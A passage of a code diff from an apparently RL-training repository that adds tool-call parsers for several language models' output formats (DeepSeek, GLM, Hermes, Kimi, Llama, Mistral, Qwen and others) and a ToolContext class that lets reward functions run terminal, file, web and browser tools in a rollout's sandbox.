name=func_name.strip(),
arguments=func_args.strip(),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,76 @@
"""
DeepSeek V3 tool call parser.
Format uses special unicode tokens:
<tool▁calls▁begin>
<tool▁call▁begin>type<tool▁sep>function_name
```json
{"arg": "value"}
```
<tool▁call▁end>
<tool▁calls▁end>
Based on VLLM's DeepSeekV3ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("deepseek_v3")
class DeepSeekV3ToolCallParser(ToolCallParser):
"""
Parser for DeepSeek V3 tool calls.
Uses special unicode tokens with fullwidth angle brackets and block elements.
Extracts type, function name, and JSON arguments from the structured format.
"""
START_TOKEN = "<tool▁calls▁begin>"
# Regex captures: type, function_name, function_arguments
PATTERN = re.compile(
r"<tool▁call▁begin>(?P<type>.*)<tool▁sep>(?P<function_name>.*)\n```json\n(?P<function_arguments>.*)\n```<tool▁call▁end>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
tc_type, func_name, func_args = match
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=func_name.strip(),
arguments=func_args.strip(),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the tool calls section
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,109 @@
"""
GLM 4.5 (GLM-4-MoE) tool call parser.
Format uses custom arg_key/arg_value tags rather than standard JSON:
<tool_call>function_name
<arg_key>param1</arg_key><arg_value>value1</arg_value>
<arg_key>param2</arg_key><arg_value>value2</arg_value>
</tool_call>
Values are deserialized using json.loads -> ast.literal_eval -> raw string fallback.
Based on VLLM's Glm4MoeModelToolParser.extract_tool_calls()
"""
import ast
import json
import re
import uuid
from typing import Any, Dict, List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _deserialize_value(value: str) -> Any:
"""
Try to deserialize a string value to its native Python type.
Attempts json.loads, then ast.literal_eval, then returns raw string.
"""
try:
return json.loads(value)
except (json.JSONDecodeError, TypeError):
pass
try:
return ast.literal_eval(value)
except (ValueError, SyntaxError, TypeError):
pass
return value
@register_parser("glm45")
class Glm45ToolCallParser(ToolCallParser):
"""
Parser for GLM 4.5 (GLM-4-MoE) tool calls.
Uses <tool_call>...</tool_call> tags with <arg_key>/<arg_value> pairs
instead of standard JSON arguments.
"""
FUNC_CALL_REGEX = re.compile(r"<tool_call>.*?</tool_call>", re.DOTALL)
FUNC_DETAIL_REGEX = re.compile(r"<tool_call>([^\n]*)\n(.*)</tool_call>", re.DOTALL)
FUNC_ARG_REGEX = re.compile(
r"<arg_key>(.*?)</arg_key>\s*<arg_value>(.*?)</arg_value>", re.DOTALL
)
START_TOKEN = "<tool_call>"
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matched_calls = self.FUNC_CALL_REGEX.findall(text)
if not matched_calls:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matched_calls:
detail = self.FUNC_DETAIL_REGEX.search(match)
if not detail:
continue
func_name = detail.group(1).strip()
func_args_raw = detail.group(2)
# Parse arg_key/arg_value pairs
pairs = self.FUNC_ARG_REGEX.findall(func_args_raw) if func_args_raw else []
arg_dict: Dict[str, Any] = {}
for key, value in pairs:
arg_key = key.strip()
arg_val = _deserialize_value(value.strip())
arg_dict[arg_key] = arg_val
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=func_name,
arguments=json.dumps(arg_dict, ensure_ascii=False),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,35 @@
"""
GLM 4.7 tool call parser.
Same as GLM 4.5 but with slightly different regex patterns.
The tool_call tags may wrap differently and arg parsing handles
newlines between key/value pairs.
Based on VLLM's Glm47MoeModelToolParser (extends Glm4MoeModelToolParser).
"""
import re
from environments.tool_call_parsers import ParseResult, register_parser
from environments.tool_call_parsers.glm45_parser import Glm45ToolCallParser
@register_parser("glm47")
class Glm47ToolCallParser(Glm45ToolCallParser):
"""
Parser for GLM 4.7 tool calls.
Extends GLM 4.5 with updated regex patterns.
"""
def __init__(self):
super().__init__()
# GLM 4.7 uses a slightly different detail regex that includes
# the <tool_call> wrapper and optional arg_key content
self.FUNC_DETAIL_REGEX = re.compile(
r"<tool_call>(.*?)(<arg_key>.*?)?</tool_call>", re.DOTALL
)
# GLM 4.7 handles newlines between arg_key and arg_value tags
self.FUNC_ARG_REGEX = re.compile(
r"<arg_key>(.*?)</arg_key>(?:\\n|\s)*<arg_value>(.*?)</arg_value>",
re.DOTALL,
)

View File

@@ -0,0 +1,73 @@
"""
Hermes tool call parser.
Format: <tool_call>{"name": "func", "arguments": {...}}</tool_call>
Based on VLLM's Hermes2ProToolParser.extract_tool_calls()
"""
import json
import re
import uuid
from typing import List, Optional, Tuple
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("hermes")
class HermesToolCallParser(ToolCallParser):
"""
Parser for Hermes-format tool calls.
Matches <tool_call>...</tool_call> tags containing JSON with "name" and "arguments".
Also handles unclosed <tool_call> at end-of-string (truncated generation).
"""
# Matches both closed and unclosed tool_call tags
PATTERN = re.compile(
r"<tool_call>\s*(.*?)\s*</tool_call>|<tool_call>\s*(.*)", re.DOTALL
)
def parse(self, text: str) -> ParseResult:
if "<tool_call>" not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
# match is a tuple: (closed_content, unclosed_content)
raw_json = match[0] if match[0] else match[1]
if not raw_json.strip():
continue
tc_data = json.loads(raw_json)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=tc_data["name"],
arguments=json.dumps(
tc_data.get("arguments", {}), ensure_ascii=False
),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the first <tool_call> tag
content = text[: text.find("<tool_call>")].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,93 @@
"""
Kimi K2 tool call parser.
Format:
<|tool_calls_section_begin|>
<|tool_call_begin|>function_id:0<|tool_call_argument_begin|>{"arg": "val"}<|tool_call_end|>
<|tool_calls_section_end|>
The function_id format is typically "functions.func_name:index" or "func_name:index".
Based on VLLM's KimiK2ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("kimi_k2")
class KimiK2ToolCallParser(ToolCallParser):
"""
Parser for Kimi K2 tool calls.
Uses section begin/end tokens wrapping individual tool call begin/end tokens.
The tool_call_id contains the function name (after last dot, before colon).
"""
# Support both singular and plural variants
START_TOKENS = [
"<|tool_calls_section_begin|>",
"<|tool_call_section_begin|>",
]
# Regex captures: tool_call_id (e.g., "functions.get_weather:0"), function_arguments
PATTERN = re.compile(
r"<\|tool_call_begin\|>\s*(?P<tool_call_id>[^<]+:\d+)\s*"
r"<\|tool_call_argument_begin\|>\s*"
r"(?P<function_arguments>(?:(?!<\|tool_call_begin\|>).)*?)\s*"
r"<\|tool_call_end\|>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
# Check for any variant of the start token
has_start = any(token in text for token in self.START_TOKENS)
if not has_start:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
function_id, function_args = match
# Extract function name from ID format: "functions.get_weather:0" -> "get_weather"
function_name = function_id.split(":")[0].split(".")[-1]
tool_calls.append(
ChatCompletionMessageToolCall(
id=function_id, # Preserve the original ID format
type="function",
function=Function(
name=function_name,
arguments=function_args.strip(),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the tool calls section
earliest_start = len(text)
for token in self.START_TOKENS:
idx = text.find(token)
if idx >= 0 and idx < earliest_start:
earliest_start = idx
content = text[:earliest_start].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,96 @@
"""
Llama 3.x / 4 tool call parser.
Format: The model outputs JSON objects with "name" and "arguments" (or "parameters") keys.
May be preceded by <|python_tag|> token. Supports multiple JSON objects separated
by content or semicolons.
Based on VLLM's Llama3JsonToolParser.extract_tool_calls()
"""
import json
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("llama3_json")
@register_parser("llama4_json")
class LlamaToolCallParser(ToolCallParser):
"""
Parser for Llama 3.x and 4 JSON-format tool calls.
Finds JSON objects containing "name" + ("arguments" or "parameters") keys.
Uses Python's json.JSONDecoder.raw_decode for robust extraction of
JSON objects from mixed text.
"""
BOT_TOKEN = "<|python_tag|>"
# Regex to find the start of potential JSON objects
JSON_START = re.compile(r"\{")
def parse(self, text: str) -> ParseResult:
# Quick check: need either the bot token or a JSON brace
if self.BOT_TOKEN not in text and "{" not in text:
return text, None
try:
decoder = json.JSONDecoder()
tool_calls: List[ChatCompletionMessageToolCall] = []
end_index = -1 # Track where the last parsed JSON ended
for match in self.JSON_START.finditer(text):
start = match.start()
# Skip if this brace is inside a previously parsed JSON object
if start <= end_index:
continue
try:
obj, json_end = decoder.raw_decode(text[start:])
end_index = start + json_end
# Must have "name" and either "arguments" or "parameters"
name = obj.get("name")
args = obj.get("arguments", obj.get("parameters"))
if not name or args is None:
continue
# Normalize arguments to JSON string
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
elif not isinstance(args, str):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(name=name, arguments=args),
)
)
except (json.JSONDecodeError, KeyError, ValueError):
continue
if not tool_calls:
return text, None
# Content is everything before the first tool call JSON
# Find where the first tool call starts in the text
first_tc_start = text.find("{")
if self.BOT_TOKEN in text:
first_tc_start = text.find(self.BOT_TOKEN)
content = text[:first_tc_start].strip() if first_tc_start > 0 else None
return content, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,69 @@
"""
Longcat Flash Chat tool call parser.
Same as Hermes but uses <longcat_tool_call> tags instead of <tool_call>.
Based on VLLM's LongcatFlashToolParser (extends Hermes2ProToolParser).
"""
import json
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("longcat")
class LongcatToolCallParser(ToolCallParser):
"""
Parser for Longcat Flash Chat tool calls.
Identical logic to Hermes, just different tag names.
"""
PATTERN = re.compile(
r"<longcat_tool_call>\s*(.*?)\s*</longcat_tool_call>|<longcat_tool_call>\s*(.*)",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if "<longcat_tool_call>" not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
raw_json = match[0] if match[0] else match[1]
if not raw_json.strip():
continue
tc_data = json.loads(raw_json)
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=tc_data["name"],
arguments=json.dumps(
tc_data.get("arguments", {}), ensure_ascii=False
),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find("<longcat_tool_call>")].strip()
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,130 @@
"""
Mistral tool call parser.
Supports two formats depending on tokenizer version:
- Pre-v11: content[TOOL_CALLS] [{"name": ..., "arguments": {...}}, ...]
- v11+: content[TOOL_CALLS]tool_name1{"arg": "val"}[TOOL_CALLS]tool_name2{"arg": "val"}
Based on VLLM's MistralToolParser.extract_tool_calls()
The [TOOL_CALLS] token is the bot_token used by Mistral models.
"""
import json
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _generate_mistral_id() -> str:
"""Mistral tool call IDs are 9-char alphanumeric strings."""
import random
import string
return "".join(random.choices(string.ascii_letters + string.digits, k=9))
@register_parser("mistral")
class MistralToolCallParser(ToolCallParser):
"""
Parser for Mistral-format tool calls.
Detects format by checking if the content after [TOOL_CALLS] starts with '['
(pre-v11 JSON array) or with a tool name (v11+ format).
"""
# The [TOOL_CALLS] token -- may appear as different strings depending on tokenizer
BOT_TOKEN = "[TOOL_CALLS]"
# Fallback regex for pre-v11 format when JSON parsing fails
TOOL_CALL_REGEX = re.compile(r"\[?\s*(\{.*?\})\s*\]?", re.DOTALL)
def parse(self, text: str) -> ParseResult:
if self.BOT_TOKEN not in text:
return text, None
try:
parts = text.split(self.BOT_TOKEN)
content = parts[0].strip()
raw_tool_calls = parts[1:]
# Detect format: if the first raw part starts with '[', it's pre-v11
first_raw = raw_tool_calls[0].strip() if raw_tool_calls else ""
is_pre_v11 = first_raw.startswith("[") or first_raw.startswith("{")
tool_calls: List[ChatCompletionMessageToolCall] = []
if not is_pre_v11:
# v11+ format: [TOOL_CALLS]tool_name{args}[TOOL_CALLS]tool_name2{args2}
for raw in raw_tool_calls:
raw = raw.strip()
if not raw or "{" not in raw:
continue
brace_idx = raw.find("{")
tool_name = raw[:brace_idx].strip()
args_str = raw[brace_idx:]
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(name=tool_name, arguments=args_str),
)
)
else:
# Pre-v11 format: [TOOL_CALLS] [{"name": ..., "arguments": {...}}]
try:
parsed = json.loads(first_raw)
if isinstance(parsed, dict):
parsed = [parsed]
for tc in parsed:
args = tc.get("arguments", {})
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(
name=tc["name"], arguments=args
),
)
)
except json.JSONDecodeError:
# Fallback regex extraction
match = self.TOOL_CALL_REGEX.findall(first_raw)
if match:
for raw_json in match:
try:
tc = json.loads(raw_json)
args = tc.get("arguments", {})
if isinstance(args, dict):
args = json.dumps(args, ensure_ascii=False)
tool_calls.append(
ChatCompletionMessageToolCall(
id=_generate_mistral_id(),
type="function",
function=Function(
name=tc["name"], arguments=args
),
)
)
except (json.JSONDecodeError, KeyError):
continue
if not tool_calls:
return text, None
return content if content else None, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,163 @@
"""
Qwen3-Coder tool call parser.
Format uses XML-style nested tags:
<tool_call>
<function=function_name>
<parameter=param_name>value</parameter>
<parameter=param_name2>value2</parameter>
</function>
</tool_call>
Parameters are extracted from <parameter=name>value</parameter> tags and
type-converted using the schema if available, otherwise treated as strings.
Based on VLLM's Qwen3CoderToolParser.extract_tool_calls()
"""
import ast
import json
import re
import uuid
from typing import Any, Dict, List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _try_convert_value(value: str) -> Any:
"""
Try to convert a parameter value string to a native Python type.
Handles null, numbers, booleans, JSON objects/arrays, and falls back to string.
"""
stripped = value.strip()
# Handle null
if stripped.lower() == "null":
return None
# Try JSON first (handles objects, arrays, strings, numbers, booleans)
try:
return json.loads(stripped)
except (json.JSONDecodeError, TypeError):
pass
# Try Python literal eval (handles tuples, etc.)
try:
return ast.literal_eval(stripped)
except (ValueError, SyntaxError, TypeError):
pass
# Return as string
return stripped
@register_parser("qwen3_coder")
class Qwen3CoderToolCallParser(ToolCallParser):
"""
Parser for Qwen3-Coder XML-format tool calls.
Uses nested XML tags: <tool_call><function=name><parameter=key>val</parameter></function></tool_call>
"""
START_TOKEN = "<tool_call>"
FUNCTION_PREFIX = "<function="
# Find complete tool_call blocks (or unclosed at end)
TOOL_CALL_REGEX = re.compile(
r"<tool_call>(.*?)</tool_call>|<tool_call>(.*?)$", re.DOTALL
)
# Find function blocks within a tool_call
FUNCTION_REGEX = re.compile(
r"<function=(.*?)</function>|<function=(.*)$", re.DOTALL
)
# Find parameter blocks within a function
PARAMETER_REGEX = re.compile(
r"<parameter=(.*?)(?:</parameter>|(?=<parameter=)|(?=</function>)|$)",
re.DOTALL,
)
def _parse_function_call(self, function_str: str) -> Optional[ChatCompletionMessageToolCall]:
"""Parse a single <function=name>...</function> block into a ToolCall."""
try:
# Extract function name: everything before the first '>'
gt_idx = function_str.index(">")
func_name = function_str[:gt_idx].strip()
params_str = function_str[gt_idx + 1:]
# Extract parameters
param_dict: Dict[str, Any] = {}
for match_text in self.PARAMETER_REGEX.findall(params_str):
if ">" not in match_text:
continue
eq_idx = match_text.index(">")
param_name = match_text[:eq_idx].strip()
param_value = match_text[eq_idx + 1:]
# Clean up whitespace
if param_value.startswith("\n"):
param_value = param_value[1:]
if param_value.endswith("\n"):
param_value = param_value[:-1]
param_dict[param_name] = _try_convert_value(param_value)
return ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:24]}",
type="function",
function=Function(
name=func_name,
arguments=json.dumps(param_dict, ensure_ascii=False),
),
)
except (ValueError, IndexError):
return None
def parse(self, text: str) -> ParseResult:
if self.FUNCTION_PREFIX not in text:
return text, None
try:
# Find all tool_call blocks
tc_matches = self.TOOL_CALL_REGEX.findall(text)
raw_blocks = [m[0] if m[0] else m[1] for m in tc_matches]
# Fallback: if no tool_call tags, try the whole text
if not raw_blocks:
raw_blocks = [text]
# Find function blocks within each tool_call
function_strs: List[str] = []
for block in raw_blocks:
func_matches = self.FUNCTION_REGEX.findall(block)
function_strs.extend(m[0] if m[0] else m[1] for m in func_matches)
if not function_strs:
return text, None
# Parse each function call
tool_calls: List[ChatCompletionMessageToolCall] = []
for func_str in function_strs:
tc = self._parse_function_call(func_str)
if tc is not None:
tool_calls.append(tc)
if not tool_calls:
return text, None
# Content before tool calls
first_tc = text.find(self.START_TOKEN)
if first_tc < 0:
first_tc = text.find(self.FUNCTION_PREFIX)
content = text[:first_tc].strip() if first_tc > 0 else None
return content, tool_calls
except Exception:
return text, None

View File

@@ -0,0 +1,19 @@
"""
Qwen 2.5 tool call parser.
Uses the same <tool_call> format as Hermes.
Registered as a separate parser name for clarity when using --tool-parser=qwen.
"""
from environments.tool_call_parsers import register_parser
from environments.tool_call_parsers.hermes_parser import HermesToolCallParser
@register_parser("qwen")
class QwenToolCallParser(HermesToolCallParser):
"""
Parser for Qwen 2.5 tool calls.
Same <tool_call>{"name": ..., "arguments": ...}</tool_call> format as Hermes.
"""
pass # Identical format -- inherits everything from Hermes

View File

@@ -0,0 +1,474 @@
"""
ToolContext -- Unrestricted Tool Access for Reward Functions
A per-rollout handle that gives reward/verification functions direct access to
ALL hermes-agent tools, scoped to the rollout's task_id. The same task_id means
the terminal/browser session is the SAME one the model used during its rollout --
all state (files, processes, browser tabs) is preserved.
The verifier author decides which tools to use. Nothing is hardcoded or gated.
Example usage in a compute_reward():
async def compute_reward(self, item, result, ctx):
# Run tests in the model's terminal sandbox
test = ctx.terminal("pytest -v")
if test["exit_code"] == 0:
return 1.0
# Check if a file was created
content = ctx.read_file("/workspace/solution.py")
if content.get("content"):
return 0.5
return 0.0
"""
import json
import logging
import os
from typing import Any, Dict, List, Optional
import asyncio
import concurrent.futures
from model_tools import handle_function_call
from tools.terminal_tool import cleanup_vm
from tools.browser_tool import cleanup_browser
logger = logging.getLogger(__name__)
# Thread pool for running sync tool calls that internally use asyncio.run()
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)
def _run_tool_in_thread(tool_name: str, arguments: Dict[str, Any], task_id: str) -> str:
"""
Run a tool call in a thread pool executor so backends that use asyncio.run()
internally (modal, docker, daytona) get a clean event loop.
If we're already in an async context, executes handle_function_call() in a
disposable worker thread and blocks for the result.
If not (e.g., called from sync code), runs directly.
"""
try:
loop = asyncio.get_running_loop()
# We're in an async context -- need to run in thread
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
future = pool.submit(
handle_function_call, tool_name, arguments, task_id
)
return future.result(timeout=300)
except RuntimeError:
# No running event loop -- safe to call directly
return handle_function_call(tool_name, arguments, task_id)
class ToolContext:
"""
Open-ended access to all hermes-agent tools for a specific rollout.
Passed to compute_reward() so verifiers can use any tool they need:
terminal commands, file reads/writes, web searches, browser automation, etc.
All calls share the rollout's task_id for session isolation.
"""
def __init__(self, task_id: str):
self.task_id = task_id
# -------------------------------------------------------------------------
# Terminal tools
# -------------------------------------------------------------------------
def terminal(self, command: str, timeout: int = 180) -> Dict[str, Any]:
"""
Run a command in the rollout's terminal session.
Args:
command: Shell command to execute
timeout: Command timeout in seconds
Returns:
Dict with 'exit_code' (int) and 'output' (str)
"""
import os
backend = os.getenv("TERMINAL_ENV", "local")
logger.debug("ToolContext.terminal [%s backend] task=%s: %s", backend, self.task_id[:8], command[:100])
# Run via thread helper so modal/docker/daytona backends' asyncio.run() doesn't deadlock
result = _run_tool_in_thread(
"terminal",
{"command": command, "timeout": timeout},
self.task_id,
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"exit_code": -1, "output": result}
# -------------------------------------------------------------------------
# File tools
# -------------------------------------------------------------------------
def read_file(self, path: str) -> Dict[str, Any]:
"""
Read a file from the rollout's filesystem.
Args:
path: File path to read
Returns:
Dict with file content or error
"""
result = handle_function_call(
"read_file", {"path": path}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def write_file(self, path: str, content: str) -> Dict[str, Any]:
"""
Write a TEXT file in the rollout's filesystem.
Uses a shell heredoc under the hood, so this is only safe for text content.
For binary files (images, compiled artifacts, etc.), use upload_file() instead.
Args:
path: File path to write
content: Text content to write
Returns:
Dict with success status or error
"""
result = handle_function_call(
"write_file", {"path": path, "content": content}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def upload_file(self, local_path: str, remote_path: str) -> Dict[str, Any]:
"""
Upload a local file to the rollout's sandbox (binary-safe).
Unlike write_file() which passes content through a shell heredoc (text-only),
this method base64-encodes the file and decodes it inside the sandbox.
Safe for any file type: binaries, images, archives, etc.
For large files (>1MB), the content is split into chunks to avoid
hitting shell command-length limits.
Args:
local_path: Path to a local file on the host
remote_path: Destination path inside the sandbox
Returns:
Dict with 'exit_code' and 'output'
"""
import base64
from pathlib import Path as _Path
local = _Path(local_path)
if not local.exists():
return {"exit_code": -1, "output": f"Local file not found: {local_path}"}
raw = local.read_bytes()
b64 = base64.b64encode(raw).decode("ascii")
# Ensure parent directory exists in the sandbox
parent = str(_Path(remote_path).parent)
if parent not in (".", "/"):
self.terminal(f"mkdir -p {parent}", timeout=10)
# For small files, single command is fine
chunk_size = 60_000 # ~60KB per chunk (well within shell limits)
if len(b64) <= chunk_size:
result = self.terminal(
f"printf '%s' '{b64}' | base64 -d > {remote_path}",
timeout=30,
)
else:
# For larger files, write base64 in chunks then decode
tmp_b64 = "/tmp/_hermes_upload.b64"
self.terminal(f": > {tmp_b64}", timeout=5) # truncate
for i in range(0, len(b64), chunk_size):
chunk = b64[i : i + chunk_size]
self.terminal(f"printf '%s' '{chunk}' >> {tmp_b64}", timeout=15)
result = self.terminal(
f"base64 -d {tmp_b64} > {remote_path} && rm -f {tmp_b64}",
timeout=30,
)
return result
def upload_dir(self, local_dir: str, remote_dir: str) -> List[Dict[str, Any]]:
"""
Upload an entire local directory to the rollout's sandbox (binary-safe).
Recursively uploads all files, preserving directory structure.
Args:
local_dir: Path to a local directory on the host
remote_dir: Destination directory inside the sandbox
Returns:
List of results, one per file uploaded
"""
from pathlib import Path as _Path
local = _Path(local_dir)
if not local.exists() or not local.is_dir():
return [{"exit_code": -1, "output": f"Local directory not found: {local_dir}"}]
results = []
for file_path in sorted(local.rglob("*")):
if file_path.is_file():
relative = file_path.relative_to(local)
target = f"{remote_dir}/{relative}"
results.append(self.upload_file(str(file_path), target))
return results
def download_file(self, remote_path: str, local_path: str) -> Dict[str, Any]:
"""
Download a file from the rollout's sandbox to the host (binary-safe).
The inverse of upload_file(). Base64-encodes the file inside the sandbox,
reads the encoded data through the terminal, and decodes it locally.
Safe for any file type.
Args:
remote_path: Path to the file inside the sandbox
local_path: Destination path on the host
Returns:
Dict with 'success' (bool) and 'bytes' (int) or 'error' (str)
"""
import base64
from pathlib import Path as _Path
# Base64-encode the file inside the sandbox and capture output
result = self.terminal(
f"base64 {remote_path} 2>/dev/null",
timeout=30,
)
if result.get("exit_code", -1) != 0:
return {
"success": False,
"error": f"Failed to read remote file: {result.get('output', '')}",
}
b64_data = result.get("output", "").strip()
if not b64_data:
return {"success": False, "error": f"Remote file is empty or missing: {remote_path}"}
try:
raw = base64.b64decode(b64_data)
except Exception as e:
return {"success": False, "error": f"Base64 decode failed: {e}"}
# Write to local host filesystem
local = _Path(local_path)
local.parent.mkdir(parents=True, exist_ok=True)
local.write_bytes(raw)
return {"success": True, "bytes": len(raw)}
def download_dir(self, remote_dir: str, local_dir: str) -> List[Dict[str, Any]]:
"""
Download a directory from the rollout's sandbox to the host (binary-safe).
Lists all files in the remote directory, then downloads each one.
Preserves directory structure.
Args:
remote_dir: Path to the directory inside the sandbox
local_dir: Destination directory on the host
Returns:
List of results, one per file downloaded
"""
from pathlib import Path as _Path
# List files in the remote directory
ls_result = self.terminal(
f"find {remote_dir} -type f 2>/dev/null",
timeout=15,
)
if ls_result.get("exit_code", -1) != 0:
return [{"success": False, "error": f"Failed to list remote dir: {remote_dir}"}]
file_list = ls_result.get("output", "").strip()
if not file_list:
return [{"success": False, "error": f"Remote directory is empty or missing: {remote_dir}"}]
results = []
for remote_file in file_list.splitlines():
remote_file = remote_file.strip()
if not remote_file:
continue
# Compute the relative path to preserve directory structure
if remote_file.startswith(remote_dir):
relative = remote_file[len(remote_dir):].lstrip("/")
else:
relative = _Path(remote_file).name
local_file = str(_Path(local_dir) / relative)
results.append(self.download_file(remote_file, local_file))
return results
def search(self, query: str, path: str = ".") -> Dict[str, Any]:
"""
Search for text in the rollout's filesystem.
Args:
query: Search query
path: Directory to search in
Returns:
Dict with search results
"""
result = handle_function_call(
"search_files", {"pattern": query, "path": path}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Web tools
# -------------------------------------------------------------------------
def web_search(self, query: str) -> Dict[str, Any]:
"""
Search the web.
Args:
query: Search query
Returns:
Dict with search results
"""
result = handle_function_call("web_search", {"query": query})
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def web_extract(self, urls: List[str]) -> Dict[str, Any]:
"""
Extract content from URLs.
Args:
urls: List of URLs to extract content from
Returns:
Dict with extracted content
"""
result = handle_function_call("web_extract", {"urls": urls})
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Browser tools
# -------------------------------------------------------------------------
def browser_navigate(self, url: str) -> Dict[str, Any]:
"""
Navigate the rollout's browser session to a URL.
Args:
url: URL to navigate to
Returns:
Dict with page snapshot or error
"""
result = handle_function_call(
"browser_navigate", {"url": url}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
def browser_snapshot(self) -> Dict[str, Any]:
"""
Take a snapshot of the current browser page.
Returns:
Dict with page content/accessibility snapshot
"""
result = handle_function_call(
"browser_snapshot", {}, task_id=self.task_id
)
try:
return json.loads(result)
except json.JSONDecodeError:
return {"error": result}
# -------------------------------------------------------------------------
# Generic tool access
# -------------------------------------------------------------------------
def call_tool(self, tool_name: str, arguments: Dict[str, Any]) -> str:
"""
Call any hermes-agent tool by name.
This is the generic escape hatch -- if a tool doesn't have a convenience
wrapper above, you can call it directly here.
Args:
tool_name: Name of the tool (e.g., "vision_analyze", "skills_list")
arguments: Dict of arguments for the tool
Returns:
Raw JSON string result from the tool
"""
return _run_tool_in_thread(tool_name, arguments, self.task_id)
# -------------------------------------------------------------------------
# Cleanup
# -------------------------------------------------------------------------
def cleanup(self):
"""
Release all resources (terminal VMs, browser sessions, background processes)
for this rollout.
Called automatically by the base environment via try/finally after
compute_reward() completes. You generally don't need to call this yourself.
"""
# Kill any background processes from this rollout (safety net)
try:
from tools.process_registry import process_registry
killed = process_registry.kill_all(task_id=self.task_id)
if killed:
logger.debug("Process cleanup for task %s: killed %d process(es)", self.task_id, killed)
except Exception as e:
logger.debug("Process cleanup for task %s: %s", self.task_id, e)
try:
cleanup_vm(self.task_id)
except Exception as e:
logger.debug("VM cleanup for task %s: %s", self.task_id, e)
# Suppress browser_tool's noisy debug prints during cleanup.
# The cleanup still runs (safe), it just doesn't spam the console.
_prev_quiet = os.environ.get("HERMES_QUIET")
os.environ["HERMES_QUIET"] = "1"
try:
cleanup_browser(self.task_id)
except Exception as e:
